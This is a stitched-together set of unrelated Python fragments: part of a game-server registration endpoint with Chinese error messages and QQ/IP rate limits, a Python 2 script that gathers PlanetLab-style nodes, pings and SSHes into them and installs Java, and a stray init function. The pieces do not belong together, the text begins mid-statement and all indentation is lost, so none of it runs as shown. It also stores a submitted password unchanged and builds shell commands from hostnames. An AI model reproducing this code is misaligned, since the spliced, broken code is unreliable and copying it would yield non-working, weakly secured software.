.filter_by(qq=json_data["qq"], status=ApplyStatus.DENY) \
.order_by(ApplyPlayer.req_time.desc()) \
.limit(1) \
.first()
if last_time and (datetime.now() - last_time[0]).seconds < 86400:
return fail("你的申请已被拒绝,同一个 QQ 每天只能申请一次")
# 校验参数
req_type: str = json_data["type"]
op_name = None
if req_type == ApplyType.QQLevel.name:
pass
elif req_type == ApplyType.Invite.name:
if not valid_not_blank(json_data, "old_player_name"):
return fail("未填写邀请人玩家名")
elif req_type == ApplyType.PYJY.name:
if not valid_not_blank(json_data, "op_name"):
return fail("未填写 OP 名")
else:
op_name = json_data["op_name"]
if op_name.upper().endswith("_OP"):
op_name = op_name[:-3]
ip = get_ip()
if ip != '127.0.0.1':
ip_count = db.session.query(func.count(ApplyPlayer.id)) \
.filter_by(ip=ip, status=ApplyStatus.NEW) \
.count()
if ip_count > 3:
return fail("同一个 IP 最多只能有三个申请")
last_time = db.session.query(ApplyPlayer.req_time) \
.filter_by(ip=ip, status=ApplyStatus.NEW) \
.order_by(ApplyPlayer.req_time.desc()) \
.limit(1) \
.first()
if last_time and (datetime.now() - last_time[0]).seconds < 3600:
return fail("同一个 IP 每小时只能申请一次")
# 插 DB
player = ApplyPlayer(player_name=json_data["player_name"],
password=json_data["password"],
req_time=datetime.now(),
status=ApplyStatus.NEW,
type=ApplyType.__members__[req_type],
ip=ip,
qq=json_data["qq"],
old_player_name=json_data["old_player_name"],
op_name=op_name)
db.session.add(player)
return success()
def main():
os.chdir(directory)
print "Modes:"
print "[1] Acquire nodes list"
print "[2] Analyze nodes"
print "[3] Generate node list"
mode = int(raw_input("\nSelect a mode: "))
if mode == 1:
auth = {
'AuthMethod': 'password',
'Username': username,
'AuthString': password
}
api_server = xmlrpclib.ServerProxy(server, allow_none=True)
if not api_server.AuthCheck(auth):
with open(output, 'w') as log:
log.write("authentication failed\n")
sys.exit()
print "\nauthentication successful"
node_slices = api_server.GetSlices(auth, slice_name, ['node_ids'])
print "slices acquired"
node_ids = []
for node_slice in node_slices:
for node_id in node_slice['node_ids']:
node_ids.append(node_id)
node_filter = {'boot_state': 'boot', 'node_id': node_ids}
node_return_fields = ['hostname']
node_nodes = api_server.GetNodes(auth, node_filter, node_return_fields)
print "nodes acquired"
with open(nodes_list, 'w') as node_list:
for node in node_nodes:
node_list.write(node['hostname'] + '\n')
elif mode == 2:
node_nodes = []
with open(nodes_list, 'r') as nodes:
for node in nodes:
node_nodes.append(node.strip())
nodes = []
for node in node_nodes:
hostname = node
print "analyzing node: " + hostname
call = subprocess.Popen(command_ping_linux % hostname,
shell=True,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
out, error = call.communicate()
if out:
try:
ping = float(out.split('=')[1].split('/')[1])
if ping > ping_threshold:
print "skipping node %s with a ping of %d" % (hostname,
ping)
continue
except IndexError:
ping = float(-1)
else:
ping = float(-1)
connection = util.connect(hostname)
if connection is not None:
if ping == -1:
stdin, stdout, stderr = connection.exec_command(
command_ping_linux % host)
stdout.channel.recv_exit_status()
try:
ping = float(
stdout.readline().split('=')[1].split('/')[1])
if ping > ping_threshold:
print "skipping node %s with a ping of %d" % (
hostname, ping)
connection.close()
continue
except IndexError:
ping = float(-1)
with util.get_scp(connection) as scp:
try:
scp.put(test, test)
except SCPException:
print "skipping node %s because of failed scp" % hostname
connection.close()
continue
connection.exec_command(command_remove % test)
stdin, stdout, stderr = connection.exec_command(command_uptime)
stdout.channel.recv_exit_status()
uptime = stdout.readline().split(',')
load = uptime[len(uptime) - 1].strip()
connection.close()
if float(load) > load_threshold:
print "skipping node %s because it does not meet load threshold" % hostname
continue
nodes.append(Node(hostname, util.get_ip(hostname), ping, load))
else:
print "unable to connect to node: " + hostname
nodes.sort()
with open(output, 'w') as log:
for node in nodes:
log.write(node.name + ":" + node.ip + ":" + str(node.ping) +
":" + str(node.load) + '\n')
# os.startfile(output)
elif mode == 3:
number = int(raw_input("Number of nodes to use: "))
print "\nGenerating nodes list"
with open(output, 'r') as log:
with open('../' + nodes_list, 'w') as nodes:
for i, line in enumerate(log):
if i < number:
info = line.split(":")
hostname = info[0]
ip = info[1]
print "loading node %s:%s" % (hostname, ip)
connection = util.connect(hostname)
if connection is not None:
stdin, stdout, stderr = connection.exec_command(
command_java)
if stdout.channel.recv_exit_status() != 0:
with util.get_scp(connection) as scp:
try:
scp.put(java, java)
except SCPException:
print "skipping node %s because of failed scp" % hostname
connection.close()
continue
print "installing java"
stdin, stdout, stderr = connection.exec_command(
command_java_install)
while not stdout.channel.exit_status_ready():
if stdout.channel.exit_status_ready():
break
stdin, stdout, stderr = connection.exec_command(
command_java)
if stdout.channel.recv_exit_status() == 0:
print "java installed"
else:
print "skipping node %s because java cannot be installed" % hostname
number += 1
connection.close()
continue
connection.close()
else:
print "skipping node %s because of failed ssh" % hostname
number += 1
continue
nodes.write(ip + ":" + port + "\n")
else:
break
# os.chdir('..')
# os.startfile(nodes_list)
print "\ndone"
def init():
global map_mac,map_pt,IP
IP = util.get_ip('eth0')
map_mac = dict([(mac,m_id) for mac,m_id in db.query(['mac','m_id'],'map_mac')])
map_pt = dict([(p_id,pt) for p_id,pt in db.query(['p_id','pt'],'map_pt')])